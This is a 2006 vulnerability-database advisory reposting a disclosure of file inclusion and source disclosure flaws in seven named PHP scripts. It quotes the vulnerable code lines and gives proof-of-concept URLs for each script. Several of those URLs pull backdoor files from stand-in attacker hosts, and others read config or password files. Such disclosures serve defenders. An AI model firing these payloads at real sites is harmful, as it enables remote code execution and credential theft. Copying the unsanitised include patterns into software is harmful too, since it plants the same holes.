Security Advisory: 7 php scripts File Inclusion / Source disclosure Vuln - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Directory Traversal Vulnerability in Goop Gallery 2.0.2
  [Full-disclosure] eXpBlog <= 0.3.5 Cross Site Scripting Vulnerabilities
  [Full-disclosure] MHL-2006-001 Public Advisory: "Eazy Cart" Multiple Security Issues
  [Full-disclosure] PacSec Hype Security Team: CGI.pm param injection

From: gmdarkfig_(at)_gmail.com <gmdarkfig_(at)_gmail.com>
Date: 11.10.2006
Subject: 7 php scripts File Inclusion / Source disclosure Vuln

#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#

# Affected.scr: TribunaLibre v3.12 Beta
# Download....: http://www.phplibre.com.es/downloads/TribunaLibre_v3.12_Beta.zip
# Poc.........: http://victim.com/ftag.php?mostrar=http://backdoor.txt?
# Vuln.code...: Line 106, <? include($_GET['mostrar']); ?>

# Affected.scr: registroTL
# Download....: http://www.phplibre.com.es/downloads/registroTL.zip
# Poc.........: http://victim.com/main.php?page=ftp://hack.com/backdrphpext
#               http://victim.com/usuarios.dat <- Passwords disclosure
# Vuln.code...: if (isset($_GET['page']) && file_exists($_GET['page'].".php"))
#               include($_GET['page'].".php");

# Affected.scr: compteur_v2
# Download....: http://zebigbrozer.free.fr/compt_new/compteur_v2.zip
# Poc.........: http://victim.xx/param_editor.php?folder=http://hack.c/backd.txt?
# Vuln.code...: Line 9 , include($_GET["folder"]."param.php")

# Affected.scr: eboli
# Download....: http://www.jhjgubbels.nl/eboli/eboli.tar.gz
# Poc.........: http://x.com/index.php?contentSpecial=http://hack.c/back.txt?&content
# Vuln.code...: Line 45, if(isset($_GET['contentSpecial']) && isset($_GET['content'])){
#                        include($_GET['contentSpecial']);

# Affected.scr: Jasmine-Web
# Download....: http://www.sourcefiles.org/Utilities/Printer/Jasmine-Web-0.0.2.tar.bz2
# Poc.........: http://victim.pl/index.php?section=ftp://hack.com/backdrphpext
# Vuln.code...: if (isset($_GET['section']) && file_exists($_GET['section'].".php")){
#               include_once($_GET['section'].".php");

# Affected.scr: Foafgen v0.3
# Download....: http://www.toxi.co.uk/foafgen/foafgen_v0.3.0.zip
# Poc.........: http://victim.com/redir.php?foaf=file.php
# Vuln.code...: Line 4, readfile($_GET['foaf']);

# Affected.scr: Album Photo Sans Nom v1.6
# Download....: http://scripts.bezut.info/releases/APSN/albumV1.6.tgz
# Poc.........: http://victim.pl/getimg.php?img=config.inc.php
# Vuln.code...: Line 47, readfile($_GET['img']);

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

test server